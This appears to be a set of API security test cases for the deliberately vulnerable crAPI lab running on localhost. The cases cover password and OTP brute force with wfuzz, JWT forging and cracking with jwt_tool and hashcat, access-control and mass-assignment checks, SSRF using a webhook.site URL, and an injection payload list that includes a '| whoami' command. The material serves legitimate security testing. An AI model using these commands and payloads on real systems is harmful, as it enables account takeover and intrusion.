Preconditions:
Install mentalist: https://github.com/sc0tfree/mentalist/wiki/Installation#linux-apt-package-manager Install cupp: https://github.com/Mebus/cupp
Steps:
wfuzz -d '{"email":"[email protected]","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://127.0.0.1:8888/identity/api/auth/login --hc 405
Expected result:
- Should able to find correct usernames and passwords
Preconditions:
- Save the response containing an excessive data exposure as "response.json".
- Pull emails from the saved JSON response and save as crapiusers file
grep -oe "[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+" response.json > crapiusers
- Sort unique emails and save as crapiuniq file
cat crapiusers | sort -u > crapiuniq
- Create passwords short list
Password1
Password3
Password123
Crapi123
Summer2022!
Spring2022!
March212006!
Fall2021!
12345Qwert!
Dorsey@2022
Steps:
- Burp suite: clusterbomb
- Set up users and passwords lists
- Run
- Payload Processing: base64-encode
- Ctrl-shift-b -> right click -> convert selection -> base 64 decode
Expected result:
- Should able to find correct password
Preconditions:
Analyze JWT token
Intercept request in burp suite
Open in Sequencer Click on Configure and highlight the token value
Click "Start Live Capture"
Use jwt_tools to analyze:
Steps:
- Automating JWT attacks Use JWT automated tool (jwt_tools)
jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh "Authorization: Bearer eyJhbGciOiJSUzI1NiJ9....2QKV-qv72Q" -M pb
Change Algorithm value to "none":
jwt_tool eyJhbGciOiJ....dWIip6Ym2QKV_-qv72Q -X a
- JWT Crack Attack Generate wordlist:
crunch 5 5 -o crapi.txt
Run jwt_tools to find secret key
jwt_tool eyJhbGciOiJSUzI1NiJ9....2QKV-qv72Q -C -d crapis.txt
Or run hashcat to crack secret sign
hashcat -a 0 -m 16500 eyJhbGyKcjHKjhw....akjF46xCpioGU0 /home/lizard/Downloads/rockyou.txt --show
Expected result:
- Should able to find the secret key
Scope:
GET /identity/api/v2/videos/:id?video_id={id}`
GET /community/api/v2/community/posts/{id}`
GET /identity/api/v2/vehicle/{id}/location`
Test Data:
- name: UserA; email: [email protected]; phone: 0112233445
- name: UserB; email: [email protected]; phone: 0112233446
Steps:
- Create a UserA account.
- Use the API and discover requests that involve resource IDs as UserA.
- Document requests that include resource IDs and should require authorization.
- Create a UserB account.
- Obtaining a valid UserB token and attempt to access UserA's resources.
Expected result:
- UserB Should be access for userA page using id parameter
Scope:
POST /workshop/api/shop/orders/return_order?order_id={id}
POST /community/api/v2/community/posts/{id}/comment
PUT /identity/api/v2/user/videos/{id}
DELETE /identity/api/v2/user/videos/{id}
Test Data:
- name: UserA; email: [email protected]; phone: 0112233445
- name: UserB; email: [email protected]; phone: 0112233446
Steps:
- Create a UserA account.
- Add new order/post new comment/upload the video on profile page
- Document requests that include resource IDs and should require authorization.
- Create a UserB account.
- Return order/post comment/edit video name of UserA id-content in scope.
- Change the value 'user' to 'admin' in url
- Delete the video of UserA
Expected result:
- User Shouldn't be able to edit content on another user's page;
Scope:
GET /identity/api/{{ver}}/user/dashboard
POST /identity/api/{{ver}}/user/videos/
PUT /identity/api/{{ver}}/user/videos/
DELETE /identity/api/{{ver}}/vehicle/vehicles
POST /identity/api/{{ver}}/user/change-email
POST /identity/api/{{ver}}/user/pictures
POST /identity/api/{{ver}}/user/reset-password
POST /identity/api/auth/{{ver}}/check-otp
GET /community/api/{{ver}}/community/posts/recent
POST /community/api/{{ver}}/community/posts
GET /community/api/{{ver}}/community/posts/
POST /community/api/{{ver}}/community/posts/{{post_id}}/comment
Test Data:
- email: [email protected]; password: 12345Qwert!; otp: 'anyvalue'
Steps:
- Create a new environment variable in postman for api version {{env}}
- Run the collection one by one with api1, api2, api3 value in variable
- Analyze the responses in each collection with different api variable
- Note that
POST /identity/api/auth/api2/check-otprequest has different response:Invalid OTP! Please try again..- Fuzz the request with command:
wfuzz -d '{"email":"[email protected]", "otp":"FUZZ","password":"12345Qwert!"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://127.0.0.1:8888/identity/api/auth/v2/check-otp --hc 500
- Note that gives us otp number with response 200
- Put received otp value in request and send the request.
Expected result:
- User should be able to change the password in old api by fuzzing otp request receiving correct value
Scope:
GET /identity/api/auth/signup
Test Data:
"isadmin": true,
"isAdmin":"true",
"admin": 1,
"admin": true,
"isadmin": 1,
"isAdmin":"1",
Steps:
- Intercept the request in Burp Suite
- Brute force new key:value field in request via Burp Suite Intruder - Cluster Bomb
- Start 'Param miner' extension in Burp suite:
Select Extensions > Param Miner > Guess params > Guess JSON parameter
Expected result:
- Find the parameters where user assigns an admin permissions
Scope:
POST /workshop/api/merchant/contact_mechanic
POST /workshop/api/shop/orders
GET /workshop/api/shop/products
Steps:
- Intercept the request in Burp Suite
- Analyze the response body
- Change the values in request
- Check the response
- Change request method from GET to post
- Check the response
Expected result:
- User shouldn't be able to add own products
Include full URLs in the POST body or parameters Include URL paths (or partial URLs) in the POST body or parameters Headers that include URLs like Referer
Scope:
POST /community/api/v2/community/posts
POST /workshop/api/shop/orders/return_order?order_id=4000
POST workshop/api/merchant/contact_mechanic
Steps:
- Intercept the request in Burp Suite
- Send to intruder
- Change the url values in requests with 'https://webhook.site/8d149a33-49a8-4ebe-926f-891d58294d8d'
- Check the response at `https://webhook.site'
Expected result:
- User could replace data in request, server sanitize request from user
Test data: sgl/nosql/command payload list:
'
''
;%00
-
-- -
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
OR 1=1/*
“or 1=1;%00
OR 1=1
admin"#
admin' --
admin" OR "1"="1
{"$gt":""}
{"$gt":-1}
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
| whoami
||
&
&&
"
;
'"
Scope:
GET /identity/api/v2/user/videos/{{video_id}}
POST /workshop/api/shop/orders/return_order?order_id=4000
POST workshop/api/merchant/contact_mechanic
POST /identity/api/v2/user/change-email
POST /identity/api/auth/v2/check-otp
POST /workshop/api/shop/orders/return_order?order_id={{fuzz}}
POST /community/api/{{ver}}/community/posts
POST /community/api/{{ver}}/coupon/validate-coupon
Steps:
- Create duplicate postman collection for fuzzing
- Create 'fuzz' environment variable
- Assign payload from payload list to variable
- Run postman collection with each value
- In Burp Suite run Intruder - Sniper with payload list from test data
- Run wfuzz:
wfuzz -z file,/usr/share/wordlists/seclists/Fuzzing/nosql.txt -H "Authorization: Bearer eyJhbGciOiJSUz....gDojE2FWg" -H "Content-Type: application/json" -d "{\"coupon_code\":FUZZ}" http://127.0.0.1:8888/community/api/v2/coupon/validate-coupon
Expected result:
- Server sanitizes url/field inputs from user